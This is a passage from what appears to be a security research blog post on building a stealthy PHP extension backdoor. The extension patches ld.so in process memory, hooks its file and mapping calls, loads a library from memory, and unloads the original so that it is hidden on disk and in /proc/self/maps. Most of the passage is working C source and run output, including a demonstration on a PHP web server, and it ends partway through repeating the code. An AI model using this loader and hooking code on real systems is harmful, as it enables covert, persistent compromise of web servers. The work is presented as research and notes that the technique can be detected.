char stub[] = {0x55, 0x48, 0x89, 0xe5, 0x48, 0xb8, 0, 0, 0, 0, 0, 0, 0, 0, 0xff, 0xd0, 0xc9, 0xc3};
size_t stub_length = 18;

#define LIBC "/lib/x86_64-linux-gnu/libc.so.6"


int     my_open(const char *pathname, int flags); 
off_t   my_pread64(int fd, void *buf, size_t count, off_t offset);
ssize_t my_read(int fd, void *buf, size_t count);
void *  my_mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset);
int     my_fstat(int fd, struct stat *buf);
int     my_close(int fd);


/*
pwndbg> disassemble 0x7ffff7fc99ad,+20
Dump of assembler code from 0x7ffff7fc99ad to 0x7ffff7fc99c1:
   0x00007ffff7fc99ad <open_verify+109>:    sub    rdx,rax
   0x00007ffff7fc99b0 <open_verify+112>:    lea    rsi,[rdi+rax*1]
   0x00007ffff7fc99b4 <open_verify+116>:    mov    edi,r15d
   0x00007ffff7fc99b7 <open_verify+119>:    call   0x7ffff7fe9b80 <__GI___read_nocancel>

*/
const char read_pattern[] = {0x48, 0x29, 0xc2, 0x48,  0x8d, 0x34,  0x07, 0x44, 0x89, 0xff, 0xe8};
#define read_pattern_length 11

/*
pwndbg> disass 0x7ffff7fcc088,+40
Dump of assembler code from 0x7ffff7fcc088 to 0x7ffff7fcc0b0:
   0x00007ffff7fcc088 <_dl_map_object_from_fd+1208>:    mov    ecx,0x812
   0x00007ffff7fcc08d <_dl_map_object_from_fd+1213>:    mov    DWORD PTR [rbp-0xe0],r11d
   0x00007ffff7fcc094 <_dl_map_object_from_fd+1220>:    call   0x7ffff7fe9cc0 <__mmap64>
*/
const char mmap_pattern[] = {0xb9, 0x12, 0x08, 0x00, 0x00, 0x44, 0x89, 0x9d, 0x20, 0xff, 0xff, 0xff, 0xe8};
#define mmap_pattern_length 13

/*
pwndbg> disass 0x7ffff7fcc0c8,+20
Dump of assembler code from 0x7ffff7fcc0c8 to 0x7ffff7fcc0dc:
   0x00007ffff7fcc0c8 <_dl_map_object_from_fd+1272>:    mov    edi,DWORD PTR [rbp-0xd4]
   0x00007ffff7fcc0ce <_dl_map_object_from_fd+1278>:    lea    rsi,[rbp-0xc0]
   0x00007ffff7fcc0d5 <_dl_map_object_from_fd+1285>:    call   0x7ffff7fe98a0 <__GI___fstat64>
   */
const char fxstat_pattern[] = {0x8b, 0xbd, 0x2c, 0xff, 0xff, 0xff, 0x48, 0x8d, 0xb5, 0x40, 0xff, 0xff, 0xff, 0xe8};
#define fxstat_pattern_length 14

/*
pwndbg> disass 0x7ffff7fcc145,+40
Dump of assembler code from 0x7ffff7fcc145 to 0x7ffff7fcc16d:
   0x00007ffff7fcc145 <_dl_map_object_from_fd+1397>:    mov    edi,DWORD PTR [rbp-0xd4]
   0x00007ffff7fcc14b <_dl_map_object_from_fd+1403>:    call   0x7ffff7fe99f0 <__GI___close_nocancel>
*/
const char close_pattern[] = {0x8b, 0xbd, 0x2c, 0xff, 0xff, 0xff, 0xe8};
#define close_pattern_length 7

/*
pwndbg> disass 0x7ffff7fc996a,+40
Dump of assembler code from 0x7ffff7fc996a to 0x7ffff7fc9992:
   0x00007ffff7fc996a <open_verify+42>: mov    esi,0x80000
   0x00007ffff7fc996f <open_verify+47>: mov    rdi,r14
   0x00007ffff7fc9972 <open_verify+50>: xor    eax,eax
   0x00007ffff7fc9974 <open_verify+52>: call   0x7ffff7fe9b00 <__GI___open64_nocancel>
*/
const char open_pattern[] = {0xbe, 0x00, 0x00, 0x08, 0x00, 0x4c, 0x89, 0xf7, 0x31, 0xc0, 0xe8};
#define open_pattern_length 11

/*
pwndbg> disass 0x00007ffff7fcc275,+40
Dump of assembler code from 0x7ffff7fcc275 to 0x7ffff7fcc29d:
   0x00007ffff7fcc275 <_dl_map_object_from_fd+1701>:    mov    rsi,rax
   0x00007ffff7fcc278 <_dl_map_object_from_fd+1704>:    mov    QWORD PTR [rbp-0x158],rax
   0x00007ffff7fcc27f <_dl_map_object_from_fd+1711>:    call   0x7ffff7fe9bb0 <__GI___pread64_nocancel>
*/
const char pread64_pattern[] = {0x48, 0x89, 0xc6, 0x48, 0x89, 0x85, 0xa8, 0xfe, 0xff, 0xff, 0xe8};
#define pread64_pattern_length 11

const char* patterns[] = {read_pattern, mmap_pattern, pread64_pattern, fxstat_pattern, close_pattern,
                          open_pattern, NULL};
const size_t pattern_lengths[] = {read_pattern_length, mmap_pattern_length, pread64_pattern_length, 
                                  fxstat_pattern_length, close_pattern_length, open_pattern_length, 0};
const char* symbols[] = {"read", "mmap", "pread", "fstat", "close", "open", NULL};
uint64_t functions[] = {(uint64_t)&my_read, (uint64_t)&my_mmap, (uint64_t)&my_pread64, (uint64_t)&my_fstat, 
                        (uint64_t)&my_close, (uint64_t)&my_open, 0}; 
char *fixes[7] = {0};

uint64_t fix_locations[7] = {0};
size_t page_size;


bool find_ld_in_memory(uint64_t *addr1, uint64_t *addr2) {
    FILE* f = NULL;
    char  buffer[1024] = {0};
    char* tmp = NULL;
    char* start = NULL;
    char* end = NULL;
    bool  found = false;

    if ((f = fopen("/proc/self/maps", "r")) == NULL){
        return found;
    }

    while ( fgets(buffer, sizeof(buffer), f) ){
        if ( strstr(buffer, "r-xp") == 0 ) {
            continue;
        }
        if ( strstr(buffer, "ld-linux-x86-64.so.2") == 0 ) {
            continue;        
        }

        buffer[strlen(buffer)-1] = 0;
        tmp = strrchr(buffer, ' ');
        if ( tmp == NULL || tmp[0] != ' ')
            continue;
        ++tmp;

        start = strtok(buffer, "-");
        *addr1 = strtoul(start, NULL, 16);
        end = strtok(NULL, " ");
        *addr2 = strtoul(end, NULL, 16);
        found = true;
    }
    fclose(f);
    return found;
}


/* hooks */

int my_open(const char *pathname, int flags) {
    void *handle;
    int (*mylegacyopen)(const char *pathnam, int flags);

    handle = dlopen (LIBC, RTLD_NOW);
    mylegacyopen = dlsym(handle, "open");
    if (strstr(pathname, "magic.so") != 0){
        printf("\t[+] Open called with magic word. Returning magic FD (0x69)\n");
        return 0x69;
    }
    return mylegacyopen(pathname, flags);
}

ssize_t my_read(int fd, void *buf, size_t count){
    void *handle;
    ssize_t (*mylegacyread)(int fd, void *buf, size_t count);

    handle = dlopen (LIBC, RTLD_NOW);
    mylegacyread = dlsym(handle, "read");
    if (fd == 0x69){
        size_t size = 0;
        if ( libdata.size - libdata.current >= count ) {
            size = count;
        } else {
            size = libdata.size - libdata.current;
        }
        memcpy(buf, libdata.data + libdata.current, size);
        libdata.current += size;
        printf("\t[+] Read called with magic FD. Returning %ld bytes from memory\n", size);
        return size;
    }
    size_t ret =  mylegacyread(fd, buf, count);
    printf("Size: %ld\n",ret);
    return ret;
}

void * my_mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset){
    int mflags = 0;
    void * ret = NULL;
    uint64_t start = 0;
    size_t size = 0;

    if ( fd == 0x69 ) {
        mflags = MAP_PRIVATE|MAP_ANON;
        if ( (flags & MAP_FIXED) != 0 ) {
            mflags |= MAP_FIXED;
        }
        ret = mmap(addr, length, PROT_READ|PROT_WRITE|PROT_EXEC, mflags, -1, 0);
        size = length > libdata.size - offset ? libdata.size - offset : length;
        memcpy(ret, libdata.data + offset, size);
        mprotect(ret, size, prot);
        if (first == 0){
            first = (uint64_t)ret;
        }
        printf("\t[+] Inside hooked mmap (fd: 0x%x)\n", fd);
        return ret;
    }
    return mmap(addr, length, prot, flags, fd, offset);
}


int my_fstat(int fd, struct stat *buf){
    void *handle;
    int (*mylegacyfstat)(int fd, struct stat *buf);


    handle = dlopen (LIBC, RTLD_NOW);
    mylegacyfstat = dlsym(handle, "fstat64");

    if ( fd == 0x69 ) {
        memset(buf, 0, sizeof(struct stat));
        buf->st_size = libdata.size;
        buf->st_ino = 0x666; // random number
        printf("\t[+] Inside hooked fstat64 (fd: 0x%x)\n", fd);
        return 0;
    }
    return mylegacyfstat(fd, buf);
}

int my_close(int fd) {
    if (fd == 0x69){
        printf("\t[+] Inside hooked close (fd: 0x%x)\n", fd);
        return 0;
    }
    return close(fd);
}

/* Patch ld.so */
bool search_and_patch(uint64_t start_addr, uint64_t end_addr, const char* pattern, const size_t length, const char* symbol, const uint64_t replacement_addr, int position) {

    bool     found = false;
    int32_t  offset = 0;
    uint64_t tmp_addr = 0;
    uint64_t symbol_addr = 0;
    char * code = NULL;
    void * page_addr = NULL;

    tmp_addr = start_addr;
    while ( ! found && tmp_addr+length < end_addr) {
        if ( memcmp((void*)tmp_addr, (void*)pattern, length) == 0 ) {
            found = true;
            continue;
        }
        ++tmp_addr;
    }

    if ( ! found ) {
        return false;
    }

    offset = *((uint64_t*)(tmp_addr + length));
    symbol_addr = tmp_addr + length + 4 + offset;

    //Save data to fix later
    fixes[position] = malloc(stub_length * sizeof(char));
    memcpy(fixes[position], (void*)symbol_addr, stub_length);
    fix_locations[position] = symbol_addr;
    printf("[*] Symbol: %s - Addr: %lx\n", symbol, fix_locations[position]);

    code = malloc(stub_length * sizeof(char));
    memcpy(code, stub, stub_length);
    memcpy(code+6, &replacement_addr, sizeof(uint64_t));

    page_addr = (void*) (((size_t)symbol_addr) & (((size_t)-1) ^ (page_size - 1)));
    mprotect(page_addr, page_size, PROT_READ | PROT_WRITE); 
    memcpy((void*)symbol_addr, code, stub_length);
    mprotect(page_addr, page_size, PROT_READ | PROT_EXEC); 
    return true;
}

/* Read file from disk */
bool load_library_from_file(char * path, lib_t *libdata) {
    struct stat st;
    FILE * file;
    size_t read;

    if ( stat(path, &st) < 0 ) {
        return false;
    }

    libdata->size = st.st_size;
    libdata->data = malloc( st.st_size );
    libdata->current = 0;

    file = fopen(path, "r");

    read = fread(libdata->data, 1, st.st_size, file);
    fclose(file);

    return true;
}


void patch_all(void){
    uint64_t start = 0;
    uint64_t end = 0;
    size_t i = 0;
    
    page_size = sysconf(_SC_PAGESIZE);
    printf("\t\t-=[ Proof of Concept ]=-\n\n");

    if (!load_library_from_file("/home/vagrant/research/php/backdoor/adepts/test.so", &libdata)){
        return;
    }
    if (!find_ld_in_memory(&start, &end)){
        return;
    }
    printf("[*] ld.so found in range [0x%lx-0x%lx]\n", start, end);
    printf("-------------[ Patching  ]-------------\n");
    while ( patterns[i] != NULL ) {
        if ( ! search_and_patch(start, end, patterns[i], pattern_lengths[i], symbols[i], functions[i], i) ) {     
            return;
        } 
        ++i;
    }
    printf("---------------------------------------\n");
    return;
}



// Basic zend_module_entry
zend_module_entry adepts_module_entry = {
    STANDARD_MODULE_HEADER,
    "adepts",                   /* Extension name */
    NULL,                   /* zend_function_entry */
    NULL,                           /* PHP_MINIT - Module initialization */
    NULL,                           /* PHP_MSHUTDOWN - Module shutdown */
    NULL,           /* PHP_RINIT - Request initialization */
    NULL,                           /* PHP_RSHUTDOWN - Request shutdown */
    NULL,           /* PHP_MINFO - Module info */
    PHP_ADEPTS_VERSION,     /* Version */
    STANDARD_MODULE_PROPERTIES
};

//Function "get_module" that will be executed by PHP
extern zend_module_entry *get_module(void){
    patch_all();
    void *handler = dlopen("./magic.so", RTLD_NOW); 
    //void *hanlder = dlopen("/home/vagrant/research/php/backdoor/adepts/test.so", RTLD_NOW);
    return &adepts_module_entry;
}



#ifdef COMPILE_DL_ADEPTS
# ifdef ZTS
ZEND_TSRMLS_CACHE_DEFINE()
# endif
ZEND_GET_MODULE(adepts)
#endif

We can test that the shared object (test.so) is loaded from memory instead of disk:

=> php  -d "extension=/home/vagrant/research/php/backdoor/adepts/adepts.so" -r "echo 1;"
        -=[ Proof of Concept ]=-

[*] ld.so found in range [0x7f0c1e953000-0x7f0c1e97d000]
-------------[ Patching  ]-------------
[*] Symbol: read - Addr: 7f0c1e977b80
[*] Symbol: mmap - Addr: 7f0c1e977cc0
[*] Symbol: pread - Addr: 7f0c1e977bb0
[*] Symbol: fstat - Addr: 7f0c1e9778a0
[*] Symbol: close - Addr: 7f0c1e9779f0
[*] Symbol: open - Addr: 7f0c1e977b00
---------------------------------------
    [+] Open called with magic word. Returning magic FD (0x69)
    [+] Read called with magic FD. Returning 832 bytes from memory
    [+] Inside hooked fstat64 (fd: 0x69)
    [+] Inside hooked mmap (fd: 0x69)
    [+] Inside hooked mmap (fd: 0x69)
    [+] Inside hooked mmap (fd: 0x69)
    [+] Inside hooked mmap (fd: 0x69)
    [+] Inside hooked close (fd: 0x69)
Lib initialized successfully!
1% 

Next question is… can we use it to load our extension again ? Let’s add a small canary and change the path at load_library_from_file() to point to our extension:

 static void check(void) __attribute__((constructor));
 void check(void){
     printf("~~~> Hello from adepts.o <~~~\n");
     return;
 }

It works!

=> php  -d "extension=/home/vagrant/research/php/backdoor/adepts/adepts.so" -r "echo 1;"
~~~> Hello from adepts.o <~~~
        -=[ Proof of Concept ]=-

[*] ld.so found in range [0x7fd97554c000-0x7fd975576000]
-------------[ Patching  ]-------------
[*] Symbol: read - Addr: 7fd975570b80
[*] Symbol: mmap - Addr: 7fd975570cc0
[*] Symbol: pread - Addr: 7fd975570bb0
[*] Symbol: fstat - Addr: 7fd9755708a0
[*] Symbol: close - Addr: 7fd9755709f0
[*] Symbol: open - Addr: 7fd975570b00
---------------------------------------
    [+] Open called with magic word. Returning magic FD (0x69)
    [+] Read called with magic FD. Returning 832 bytes from memory
    [+] Inside hooked fstat64 (fd: 0x69)
    [+] Inside hooked mmap (fd: 0x69)
    [+] Inside hooked mmap (fd: 0x69)
    [+] Inside hooked mmap (fd: 0x69)
    [+] Inside hooked mmap (fd: 0x69)
    [+] Inside hooked close (fd: 0x69)
~~~> Hello from adepts.o <~~~

We can see how the message was printed twice: the first when PHP loads our extension and the second when the extension is loaded directly from memory.

At this point every other shared object loaded by the process will go through our hooks. That’s something that should be fine but to avoid any issue (imagine a collision between a file descriptor and our magic value) we have to repatch the memory to remove the hooks. The other reason to restore the original code is because we are kind and polite :).

 /* remove hooks */
 bool fix_hook(char *fix, uint64_t addr){
     void *page_addr = (void*) (((size_t)addr) & (((size_t)-1) ^ (page_size - 1)));
     mprotect(page_addr, page_size, PROT_READ | PROT_WRITE);
     memcpy((void *)addr, fix, stub_length);
     mprotect(page_addr, page_size, PROT_READ | PROT_EXEC);
     return true;
 }
 
 extern void restore(void){
     int i = 0;
     printf("[*] Fixing hooks\n");
     while ( patterns[i] != NULL ) {m
            if ( ! fix_hook(fixes[i], fix_locations[i]) ) {
                return;
            }
            ++i;
     }
     return;
 }

The secret sauce

Although we have a new copy of our extension loaded from memory we can not unload the original because the symbols are binded.

    147212: binding file ./magic.so [0] to /home/vagrant/research/php/backdoor/adepts/adepts.so [0]: normal symbol `onLoad'
    147212: binding file ./magic.so [0] to /home/vagrant/research/php/backdoor/adepts/adepts.so [0]: normal symbol `stub_length'
    147212: binding file ./magic.so [0] to /home/vagrant/research/php/backdoor/adepts/adepts.so [0]: normal symbol `adepts_module_entry'

Even if we call multiple times dlclose() the process will keep always references to it, so it would not be unloaded. To solve this issue we have to compile the extension using the flag -fvisibility=hidden and only set get_module symbol to default visibility.

Now the question is… how can we unload the extension? how can we set the MINIT/MSHUTDOWN/RINIT/RSHUTDOWN hooks so our code will be executed? Well, the answer is the same: the original get_module() must return a pointer to a zend_module_entry located in the new copy loaded from memory. And also this structure must be set with pointers to functions in this copy.

We need to have the code to execute the dlclose() pointed by module_startup_func so it would be executed when Zend Engine processes the data. The problem is we can not use dlsym() to find the function address because we set the visibility to hidden to avoid the symbol collision issue. Alternatively we can get the address in our original extension minus the base address, and then use the address of the first mapped region in our copied version plus this difference as an offset:

    static Dl_info info;
    dladdr(&info, &info);
    uint64_t diffLoad = (uint64_t)&onLoad - (uint64_t)info.dli_fbase;
    uint64_t diffRequest = (uint64_t)&onRequest - (uint64_t)info.dli_fbase;
    uint64_t newLoad = first + diffLoad;
    uint64_t newRequest = first + diffRequest;

    uint64_t diffModule = (uint64_t)&adepts_module_entry - (uint64_t)info.dli_fbase;
    ((zend_module_entry *)(diffModule + first))->module_startup_func = (void *)newLoad;
    ((zend_module_entry *)(diffModule + first))->request_shutdown_func = (void *)newRequest;
    return (void *)(diffModule + first);

And the code at newLoad() and newRequest():

/* Functions to execute */
zend_result onLoad(int a, int b){
    printf("[^] Executing onLoad\n");
    void* handle = dlopen("/home/vagrant/research/php/backdoor/adepts/adepts.so", RTLD_LAZY);
    while (dlclose(handle) != -1){
        printf("[*] dlclose()\n");
    }
    return SUCCESS;
}
zend_result onRequest(void){
    php_printf("\n[/!\\] Adepts of 0xCC [/!\\]\n\n");
    return SUCCESS;
}

We can verify that it works:

=> sudo php  -d "extension=/home/vagrant/research/php/backdoor/adepts/adepts.so" -S 127.0.0.1:80
~~~> Hello from adepts.o <~~~
                -=[ Proof of Concept ]=-

[*] ld.so found in range [0x7f60980a7000-0x7f60980d1000]
-------------[ Patching  ]-------------
[*] Symbol: read - Addr: 7f60980cbb80
[*] Symbol: mmap - Addr: 7f60980cbcc0
[*] Symbol: pread - Addr: 7f60980cbbb0
[*] Symbol: fstat - Addr: 7f60980cb8a0
[*] Symbol: close - Addr: 7f60980cb9f0
[*] Symbol: open - Addr: 7f60980cbb00
---------------------------------------
        [+] Open called with magic word. Returning magic FD (0x69)
        [+] Read called with magic FD. Returning 832 bytes from memory
        [+] Inside hooked fstat64 (fd: 0x69)
        [+] Inside hooked mmap (fd: 0x69)
        [+] Inside hooked mmap (fd: 0x69)
        [+] Inside hooked mmap (fd: 0x69)
        [+] Inside hooked mmap (fd: 0x69)
        [+] Inside hooked close (fd: 0x69)
~~~> Hello from adepts.o <~~~
---------------------------------------
[*] Fixing hooks
[^] Executing onLoad
[*] dlclose()
[*] dlclose()
[Mon Dec 26 20:59:11 2022] PHP 8.2.0 Development Server (http://127.0.0.1:80) started
[Mon Dec 26 20:59:26 2022] 127.0.0.1:42582 Accepted
[Mon Dec 26 20:59:26 2022] 127.0.0.1:42582 [200]: GET /index.php
[Mon Dec 26 20:59:26 2022] 127.0.0.1:42582 Closing

And we can see that even when the original extension as unloaded, the copy version from memory still working:

=> curl localhost/index.php                                                                     
Hello World!

[/!\] Adepts of 0xCC [/!\]

If we change the index.php to check /proc/self/maps contents we can see how it’s β€œinvisible” (well, you can see the anomalous memory regions that should be enough to detect it):

=> curl localhost/index.php                                                                                                                                                                                                                                                  
561150c00000-561150d2c000 r--p 00000000 08:01 2523                       /usr/local/bin/php                                                                                                                                                                                         
561150e00000-56115161b000 r-xp 00200000 08:01 2523                       /usr/local/bin/php                                                                                                                                                                                         
561151800000-56115201c000 r--p 00c00000 08:01 2523                       /usr/local/bin/php                                                                                                                                                                                         
56115231d000-561152400000 r--p 0151d000 08:01 2523                       /usr/local/bin/php                                                                                                                                                                                         
561152400000-561152406000 rw-p 01600000 08:01 2523                       /usr/local/bin/php                                                                                                                                                                                         
561152406000-561152424000 rw-p 00000000 00:00 0                                                                                                                                                                                                                                     
561152a2e000-561152c26000 rw-p 00000000 00:00 0                          [heap]                                                                                                                                                                                                     
7f9f97f17000-7f9f98200000 r--p 00000000 08:01 6308                       /usr/lib/locale/locale-archive                                                                                                                                                                             
7f9f98200000-7f9f98400000 rw-p 00000000 00:00 0                                                                                                                                                                                                                                     
7f9f98490000-7f9f984e1000 rw-p 00000000 00:00 0                                                                                                                                                                                                                                     
7f9f9850a000-7f9f9853a000 rw-p 00000000 00:00 0                                                                                                                                                                                                                                     
7f9f9853a000-7f9f9853b000 r--p 00000000 00:00 0                                                                                                                                                                                                                                     
7f9f9853b000-7f9f9853d000 r-xp 00000000 00:00 0                                                                                                                                                                                                                                     
7f9f9853d000-7f9f9853f000 r--p 00000000 00:00 0                                                                                                                                                                                                                                     
7f9f9853f000-7f9f98540000 rw-p 00000000 00:00 0                                                                                                                                                                                                                                     
7f9f98540000-7f9f98597000 r--p 00000000 08:01 6312                       /usr/lib/locale/C.utf8/LC_CTYPE                                                                                                                                                                            
7f9f98597000-7f9f9859c000 rw-p 00000000 00:00 0                                                                                                                                                                                                                                     
7f9f9859c000-7f9f9859f000 r--p 00000000 08:01 3638                       /usr/lib/x86_64-linux-gnu/libgcc_s.so.1                                                                                                                                                                    
7f9f9859f000-7f9f985b6000 r-xp 00003000 08:01 3638                       /usr/lib/x86_64-linux-gnu/libgcc_s.so.1                                                                                                                                                                    
7f9f985b6000-7f9f985ba000 r--p 0001a000 08:01 3638                       /usr/lib/x86_64-linux-gnu/libgcc_s.so.1                                                                                                                                                                    
7f9f985ba000-7f9f985bb000 r--p 0001d000 08:01 3638                       /usr/lib/x86_64-linux-gnu/libgcc_s.so.1                                                                                                                                                                    
7f9f985bb000-7f9f985bc000 rw-p 0001e000 08:01 3638                       /usr/lib/x86_64-linux-gnu/libgcc_s.so.1                                                                                                                                                                    
7f9f985bc000-7f9f98656000 r--p 00000000 08:01 3639                       /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.30                                                                                                                                                              
7f9f98656000-7f9f98766000 r-xp 0009a000 08:01 3639                       /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.30                                                                                                                                                              
7f9f98766000-7f9f987d5000 r--p 001aa000 08:01 3639                       /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.30                                                                                                                                                              
7f9f987d5000-7f9f987e0000 r--p 00218000 08:01 3639                       /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.30                                                                                                                                                              
7f9f987e0000-7f9f987e3000 rw-p 00223000 08:01 3639                       /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.30                                                                                                                                                              
7f9f987e3000-7f9f987e6000 rw-p 00000000 00:00 0                                                                                                                                                                                                                                     
7f9f987e6000-7f9f987e7000 r--p 00000000 08:01 4871                       /usr/lib/x86_64-linux-gnu/libicudata.so.70.1                                                                                                                                                               
7f9f987e7000-7f9f987e8000 r-xp 00001000 08:01 4871                       /usr/lib/x86_64-linux-gnu/libicudata.so.70.1                                                                                                                                                               
7f9f987e8000-7f9f9a402000 r--p 00002000 08:01 4871                       /usr/lib/x86_64-linux-gnu/libicudata.so.70.1                                                                                                                                                               
7f9f9a402000-7f9f9a403000 r--p 01c1b000 08:01 4871                       /usr/lib/x86_64-linux-gnu/libicudata.so.70.1
7f9f9a403000-7f9f9a404000 rw-p 01c1c000 08:01 4871                       /usr/lib/x86_64-linux-gnu/libicudata.so.70.1                                                                                                                                                         [0/39]
7f9f9a404000-7f9f9a406000 rw-p 00000000 00:00 0                      
7f9f9a406000-7f9f9a409000 r--p 00000000 08:01 3968                       /usr/lib/x86_64-linux-gnu/liblzma.so.5.2.5                       
7f9f9a409000-7f9f9a424000 r-xp 00003000 08:01 3968                       /usr/lib/x86_64-linux-gnu/liblzma.so.5.2.5                       
7f9f9a424000-7f9f9a42f000 r--p 0001e000 08:01 3968                       /usr/lib/x86_64-linux-gnu/liblzma.so.5.2.5                       
7f9f9a42f000-7f9f9a430000 r--p 00028000 08:01 3968                       /usr/lib/x86_64-linux-gnu/liblzma.so.5.2.5                       
7f9f9a430000-7f9f9a431000 rw-p 00029000 08:01 3968                       /usr/lib/x86_64-linux-gnu/liblzma.so.5.2.5                       
7f9f9a431000-7f9f9a433000 r--p 00000000 08:01 4818                       /usr/lib/x86_64-linux-gnu/libz.so.1.2.11                         
7f9f9a433000-7f9f9a444000 r-xp 00002000 08:01 4818                       /usr/lib/x86_64-linux-gnu/libz.so.1.2.11                         
7f9f9a444000-7f9f9a44a000 r--p 00013000 08:01 4818                       /usr/lib/x86_64-linux-gnu/libz.so.1.2.11                         
7f9f9a44a000-7f9f9a44b000 ---p 00019000 08:01 4818                       /usr/lib/x86_64-linux-gnu/libz.so.1.2.11                         
7f9f9a44b000-7f9f9a44c000 r--p 00019000 08:01 4818                       /usr/lib/x86_64-linux-gnu/libz.so.1.2.11                         
7f9f9a44c000-7f9f9a44d000 rw-p 0001a000 08:01 4818                       /usr/lib/x86_64-linux-gnu/libz.so.1.2.11                         
7f9f9a44d000-7f9f9a4b3000 r--p 00000000 08:01 4876                       /usr/lib/x86_64-linux-gnu/libicuuc.so.70.1                       
7f9f9a4b3000-7f9f9a5a6000 r-xp 00066000 08:01 4876                       /usr/lib/x86_64-linux-gnu/libicuuc.so.70.1                       
7f9f9a5a6000-7f9f9a632000 r--p 00159000 08:01 4876                       /usr/lib/x86_64-linux-gnu/libicuuc.so.70.1                       
7f9f9a632000-7f9f9a645000 r--p 001e4000 08:01 4876                       /usr/lib/x86_64-linux-gnu/libicuuc.so.70.1                       
7f9f9a645000-7f9f9a646000 rw-p 001f7000 08:01 4876                       /usr/lib/x86_64-linux-gnu/libicuuc.so.70.1                       
7f9f9a646000-7f9f9a648000 rw-p 00000000 00:00 0                      
7f9f9a648000-7f9f9a670000 r--p 00000000 08:01 3644                       /usr/lib/x86_64-linux-gnu/libc.so.6                              
7f9f9a670000-7f9f9a805000 r-xp 00028000 08:01 3644                       /usr/lib/x86_64-linux-gnu/libc.so.6                              
7f9f9a805000-7f9f9a85d000 r--p 001bd000 08:01 3644                       /usr/lib/x86_64-linux-gnu/libc.so.6                              
7f9f9a85d000-7f9f9a861000 r--p 00214000 08:01 3644                       /usr/lib/x86_64-linux-gnu/libc.so.6                              
7f9f9a861000-7f9f9a863000 rw-p 00218000 08:01 3644                       /usr/lib/x86_64-linux-gnu/libc.so.6                              
7f9f9a863000-7f9f9a870000 rw-p 00000000 00:00 0                      
7f9f9a870000-7f9f9a89f000 r--p 00000000 08:01 2255                       /usr/lib/x86_64-linux-gnu/libxml2.so.2.9.13                      
7f9f9a89f000-7f9f9a9f2000 r-xp 0002f000 08:01 2255                       /usr/lib/x86_64-linux-gnu/libxml2.so.2.9.13                      
7f9f9a9f2000-7f9f9aa46000 r--p 00182000 08:01 2255                       /usr/lib/x86_64-linux-gnu/libxml2.so.2.9.13                      
7f9f9aa46000-7f9f9aa47000 ---p 001d6000 08:01 2255                       /usr/lib/x86_64-linux-gnu/libxml2.so.2.9.13                      
7f9f9aa47000-7f9f9aa50000 r--p 001d6000 08:01 2255                       /usr/lib/x86_64-linux-gnu/libxml2.so.2.9.13                      
7f9f9aa50000-7f9f9aa51000 rw-p 001df000 08:01 2255                       /usr/lib/x86_64-linux-gnu/libxml2.so.2.9.13                      
7f9f9aa51000-7f9f9aa52000 rw-p 00000000 00:00 0                      
7f9f9aa52000-7f9f9aa60000 r--p 00000000 08:01 3647                       /usr/lib/x86_64-linux-gnu/libm.so.6                              
7f9f9aa60000-7f9f9aadc000 r-xp 0000e000 08:01 3647                       /usr/lib/x86_64-linux-gnu/libm.so.6                              
7f9f9aadc000-7f9f9ab37000 r--p 0008a000 08:01 3647                       /usr/lib/x86_64-linux-gnu/libm.so.6                              
7f9f9ab37000-7f9f9ab38000 r--p 000e4000 08:01 3647                       /usr/lib/x86_64-linux-gnu/libm.so.6                              
7f9f9ab38000-7f9f9ab39000 rw-p 000e5000 08:01 3647                       /usr/lib/x86_64-linux-gnu/libm.so.6                              
7f9f9ab43000-7f9f9ab4a000 r--s 00000000 08:01 3960                       /usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache              
7f9f9ab4a000-7f9f9ab4c000 rw-p 00000000 00:00 0                      
7f9f9ab4c000-7f9f9ab4e000 r--p 00000000 08:01 3641                       /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2                   
7f9f9ab4e000-7f9f9ab72000 r-xp 00002000 08:01 3641                       /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2                   
7f9f9ab72000-7f9f9ab73000 r-xp 00026000 08:01 3641                       /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2                   
7f9f9ab73000-7f9f9ab78000 r-xp 00027000 08:01 3641                       /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2                   
7f9f9ab78000-7f9f9ab83000 r--p 0002c000 08:01 3641                       /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2                   
7f9f9ab84000-7f9f9ab86000 r--p 00037000 08:01 3641                       /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2                   
7f9f9ab86000-7f9f9ab88000 rw-p 00039000 08:01 3641                       /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2                   
7ffd2886b000-7ffd2888c000 rw-p 00000000 00:00 0                          [stack]                                                          
7ffd2897b000-7ffd2897f000 r--p 00000000 00:00 0                          [vvar]                                                           
7ffd2897f000-7ffd28981000 r-xp 00000000 00:00 0                          [vdso]                                                           
ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0                  [vsyscall

All together

The final code is:

/* adepts extension for PHP */

#ifdef HAVE_CONFIG_H
# include "config.h"
#endif

#include "php.h"
#include "ext/standard/info.h"
#include "php_adepts.h"

#include <sys/mman.h>
#include <pthread.h>


/* For compatibility with older PHP versions */
#ifndef ZEND_PARSE_PARAMETERS_NONE
#define ZEND_PARSE_PARAMETERS_NONE() \
    ZEND_PARSE_PARAMETERS_START(0, 0) \
    ZEND_PARSE_PARAMETERS_END()
#endif




typedef struct {
    void * data;
    size_t size;
    size_t current;
} lib_t;

lib_t libdata;


char stub[] = {0x55, 0x48, 0x89, 0xe5, 0x48, 0xb8, 0, 0, 0, 0, 0, 0, 0, 0, 0xff, 0xd0, 0xc9, 0xc3};
size_t stub_length = 18;

#define LIBC "/lib/x86_64-linux-gnu/libc.so.6"


int     my_open(const char *pathname, int flags); 
off_t   my_pread64(int fd, void *buf, size_t count, off_t offset);
ssize_t my_read(int fd, void *buf, size_t count);
void *  my_mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset);
int     my_fstat(int fd, struct stat *buf);
int     my_close(int fd);


/*
pwndbg> disassemble 0x7ffff7fc99ad,+20
Dump of assembler code from 0x7ffff7fc99ad to 0x7ffff7fc99c1:
   0x00007ffff7fc99ad <open_verify+109>:    sub    rdx,rax
   0x00007ffff7fc99b0 <open_verify+112>:    lea    rsi,[rdi+rax*1]
